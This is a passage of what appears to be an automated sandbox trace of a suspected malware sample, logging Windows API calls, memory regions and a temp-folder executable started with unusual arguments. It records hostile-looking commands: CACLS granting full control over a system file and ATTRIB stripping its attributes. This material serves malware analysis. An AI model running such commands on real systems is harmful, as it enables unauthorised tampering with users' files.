_String2="SET") returned -16 [0117.066] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0117.066] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0117.066] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0117.066] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0117.066] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0117.066] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0117.066] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0117.066] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0117.066] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0117.066] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0117.066] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0117.066] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0117.066] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0117.066] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0117.066] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0117.066] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0117.066] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0117.067] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0117.067] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0117.067] _wcsicmp 
(_String1="CACLS", _String2="BREAK") returned 1 [0117.067] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0117.067] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0117.067] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0117.067] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0117.067] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0117.067] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0117.067] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0117.067] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0117.067] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0117.067] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0117.067] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0117.067] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0117.067] _wcsicmp 
(_String1="CACLS", _String2="VOL") returned -19 [0117.067] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0117.067] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0117.067] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0117.067] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0117.067] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0117.067] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0117.067] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0117.067] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0117.068] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0117.068] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0117.068] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0117.068] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0117.068] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0117.068] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0117.068] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0117.068] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0117.068] SetErrorMode (uMode=0x0) returned 0x0 [0117.068] SetErrorMode (uMode=0x1) returned 0x0 [0117.068] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x371e00, lpFilePart=0x24f41c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f41c*="Desktop") returned 0x18 [0117.068] SetErrorMode (uMode=0x0) returned 0x1 [0117.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.068] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.143] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.143] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0117.143] GetLastError () returned 0x2 [0117.143] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0117.144] GetLastError () returned 0x2 [0117.144] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0117.144] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0117.144] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0117.144] GetLastError () returned 0x2 [0117.144] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0117.144] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0117.144] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.144] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.144] GetConsoleTitleW (in: lpConsoleTitle=0x24f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.144] InitializeProcThreadAttributeList 
(in: lpAttributeList=0x24f518, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5e0 | out: lpAttributeList=0x24f518, lpSize=0x24f5e0) returned 1 [0117.144] UpdateProcThreadAttribute (in: lpAttributeList=0x24f518, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f518, lpPreviousValue=0x0) returned 1 [0117.144] GetStartupInfoW (in: lpStartupInfo=0x24f4d4 | out: lpStartupInfo=0x24f4d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0117.145] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0117.146] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f574*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5c0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f5c0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xec0, dwThreadId=0xec4)) returned 1 [0117.497] CloseHandle (hObject=0x4c) returned 1 [0117.497] SetEnvironmentVariableW 
(lpName="COPYCMD", lpValue=0x0) returned 1 [0117.497] GetEnvironmentStringsW () returned 0x370270* [0117.497] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.497] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0118.174] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f4b4 | out: lpExitCode=0x24f4b4*=0x0) returned 1 [0118.174] CloseHandle (hObject=0x50) returned 1 [0118.174] _vsnwprintf (in: _Buffer=0x24f5fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4c0 | out: _Buffer="00000000") returned 8 [0118.174] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0118.174] GetEnvironmentStringsW () returned 0x372328* [0118.175] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0118.175] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0118.175] GetEnvironmentStringsW () returned 0x372328* [0118.175] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0118.175] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f518 | out: lpAttributeList=0x24f518) [0118.175] GetConsoleTitleW (in: lpConsoleTitle=0x24f8fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.175] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0118.176] GetLastError () returned 0x2 [0118.176] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0118.176] GetLastError () returned 0x2 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0118.176] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0xffffffff [0118.176] GetLastError () returned 0x2 [0118.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24f198, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f198) returned 0x360f30 [0118.177] FindClose (in: hFindFile=0x360f30 | out: hFindFile=0x360f30) returned 1 [0118.177] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.177] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.177] GetConsoleTitleW (in: lpConsoleTitle=0x24f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.177] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f518, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f5e0 | out: lpAttributeList=0x24f518, lpSize=0x24f5e0) returned 1 [0118.177] UpdateProcThreadAttribute (in: lpAttributeList=0x24f518, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f5d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f518, lpPreviousValue=0x0) returned 1 [0118.177] GetStartupInfoW (in: lpStartupInfo=0x24f4d4 | out: lpStartupInfo=0x24f4d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0118.177] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0118.177] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f574*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f5c0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"", lpProcessInformation=0x24f5c0*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf1c, dwThreadId=0xf20)) returned 1 [0118.665] CloseHandle (hObject=0x50) returned 1 [0118.665] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.665] GetEnvironmentStringsW () returned 0x372328* [0118.665] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0118.665] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0119.240] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f4b4 | out: lpExitCode=0x24f4b4*=0x0) returned 1 [0119.240] CloseHandle (hObject=0x4c) returned 1 [0119.240] _vsnwprintf (in: _Buffer=0x24f5fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f4c0 | out: _Buffer="00000000") returned 8 
[0119.240] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0119.240] GetEnvironmentStringsW () returned 0x372328* [0119.241] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0119.242] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0119.243] GetEnvironmentStringsW () returned 0x372328* [0119.243] FreeEnvironmentStringsW (penv=0x372328) returned 1 [0119.243] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f518 | out: lpAttributeList=0x24f518) [0119.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.243] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.243] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0119.243] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.243] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0119.244] SetConsoleInputExeNameW () returned 0x1 [0119.244] GetConsoleOutputCP () returned 0x1b5 [0119.244] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0119.244] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.244] exit (_Code=0) Process: id = "52" image_name = "w588h5dn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe" page_root = "0x7ea16640" os_pid = "0xe10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0xd94" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" 
[0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7990 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7991 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7992 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7993 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "w588h5dn.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe") Region: id = 7994 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7995 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7996 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7997 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7998 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7999 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8000 start_va = 0x150000 end_va 
= 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 8001 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8002 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 8003 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8004 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8005 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8006 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8007 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8008 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8009 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8010 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8011 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 8012 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8013 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8017 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8018 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 8019 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 8020 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 8021 start_va = 0x11e0000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 8265 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 8266 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 8330 start_va = 
0x11e0000 end_va = 0x12befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 8331 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 8332 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 8333 start_va = 0x3d0000 end_va = 0x3d2fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 8334 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Thread: id = 82 os_tid = 0xe14 [0115.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x825266a0, dwHighDateTime=0x1d440a9)) [0115.689] GetCurrentProcessId () returned 0xe10 [0115.689] GetCurrentThreadId () returned 0xe14 [0115.689] GetTickCount () returned 0x27751 [0115.689] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=17247825433) returned 1 [0115.689] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0115.689] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 
0x76910000 [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0115.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.692] GetCurrentThreadId () returned 0xe14 [0115.692] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, 